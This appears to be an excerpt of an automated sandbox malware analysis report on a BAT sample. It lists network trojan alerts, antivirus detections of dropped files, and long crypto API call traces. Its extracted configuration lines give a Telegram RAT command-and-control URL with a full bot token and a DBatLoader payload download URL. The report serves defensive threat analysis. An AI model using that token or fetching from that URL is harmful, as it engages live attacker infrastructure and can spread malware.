              2024-12-18T16:32:30.546193+010028530061A Network Trojan was detected192.168.2.849939149.154.167.220443TCP
              2024-12-18T16:32:30.916664+010028530061A Network Trojan was detected192.168.2.849940149.154.167.220443TCP
              2024-12-18T16:32:32.392213+010028530061A Network Trojan was detected192.168.2.849946149.154.167.220443TCP
              2024-12-18T16:32:32.530469+010028530061A Network Trojan was detected192.168.2.849947149.154.167.220443TCP
              2024-12-18T16:32:36.869744+010028530061A Network Trojan was detected192.168.2.849948149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\Public\Libraries\spoolsv.COMAvira: detection malicious, Label: HEUR/AGEN.1326111
              Source: C:\Users\Public\Libraries\Cneehezx.PIFAvira: detection malicious, Label: HEUR/AGEN.1326111
              Found malware configuration
              Source: xzeheenC.pif.7064.26.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
              Source: spoolsv.COM.9.drMalware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}
              Multi AV Scanner detection for submitted file
              Source: F.O Pump Istek,Docx.batReversingLabs: Detection: 23%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D02C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF792D02C2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D02F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF792D02F38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF792D7B3D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D753E8 CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF792D753E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D513F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,7_2_00007FF792D513F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DC93A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,7_2_00007FF792DC739C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D733A0 CryptVerifyCertificateSignature,CertCompareCertificateName,7_2_00007FF792D733A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,7_2_00007FF792DA33B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D93390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF792D93390
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,7_2_00007FF792D1B36C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D55338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF792D55338
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D27340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,7_2_00007FF792D27340
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,7_2_00007FF792D4B350
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF792D2B324
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D934F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF792D934F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D53504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,7_2_00007FF792D53504
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC14F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,7_2_00007FF792DC14F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DAB4EC CryptDecodeObjectEx,SetLastError,7_2_00007FF792DAB4EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBF4A0 CryptHashPublicKeyInfo,SetLastError,7_2_00007FF792DBF4A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D99480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D99480
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,7_2_00007FF792D7F488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DAB464 CryptEncodeObjectEx,SetLastError,7_2_00007FF792DAB464
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF792DC141C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D9342C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF5438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF792CF5438
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,7_2_00007FF792DC7214
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE9208 #357,NCryptEnumKeys,#360,#358,7_2_00007FF792DE9208
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D931C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF792D931C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D911C8 NCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF792D911C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC71C8 BCryptDestroyKey,#360,7_2_00007FF792DC71C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D651A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,7_2_00007FF792D651A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7178 BCryptCloseAlgorithmProvider,#360,7_2_00007FF792DC7178
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D73188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,7_2_00007FF792D73188
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D75164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF792D75164
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,7_2_00007FF792D7F168
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7124 BCryptGenerateKeyPair,#360,7_2_00007FF792DC7124
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF792DB511C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D49134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF792D49134
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF792D2D304
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF792D7D30C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D692D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF792D692D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D8F2F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D592C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF792D592C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D732D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF792D732D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,7_2_00007FF792D5B2B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D932A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF792D932A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7290 NCryptIsKeyHandle,#359,#360,#357,#358,7_2_00007FF792DC7290
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,7_2_00007FF792DBD28C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2D240 #357,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF792D2D240
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF792DBF7FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF792D7B808
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF792D2F810
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF792DA97E4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D317D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF792D317D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D937A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D937A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF792D6577C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF792D0B788
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DAB794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF792DAB794
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF792D2D790
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF792D5F774
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D95768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D95768
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF792DBD750
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D618DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF792D618DC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D038FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF792D038FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF792D7B8D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF792DC98B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D69878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF792D69878
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D27884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF792D27884
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D93860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D93860
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF792D8184C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF792D7D850
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D795FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF792D795FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D555F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF792D555F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D1D5C2
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC9580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF792DC9580
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D93590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D93590
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF792D5B55C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBF570 CryptHashCertificate,SetLastError,7_2_00007FF792DBF570
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF792D7F6D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D936E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D936E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DAD6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF792DAD6A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D476B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF792D476B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D05664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF792D05664
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB9688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF792DB9688
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF792D1D660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF792D7B664
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF792D6366C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D8F644
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBF650 CryptHashCertificate2,SetLastError,7_2_00007FF792DBF650
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D93654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF792D93654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1F630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF792D1F630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D93BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D93BEB
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF792D9BBC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D19BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF792D19BC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF5BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF792CF5BA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF792D1BB80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF792DBFB94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5B90 CryptDecodeObjectEx,memmove,7_2_00007FF792DF5B90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF792DC7B60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D5BB38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC5B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF792DC5B44
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF792D9FB50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCBB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF792DCBB50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D85CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF792D85CE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D81C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF792D81C84
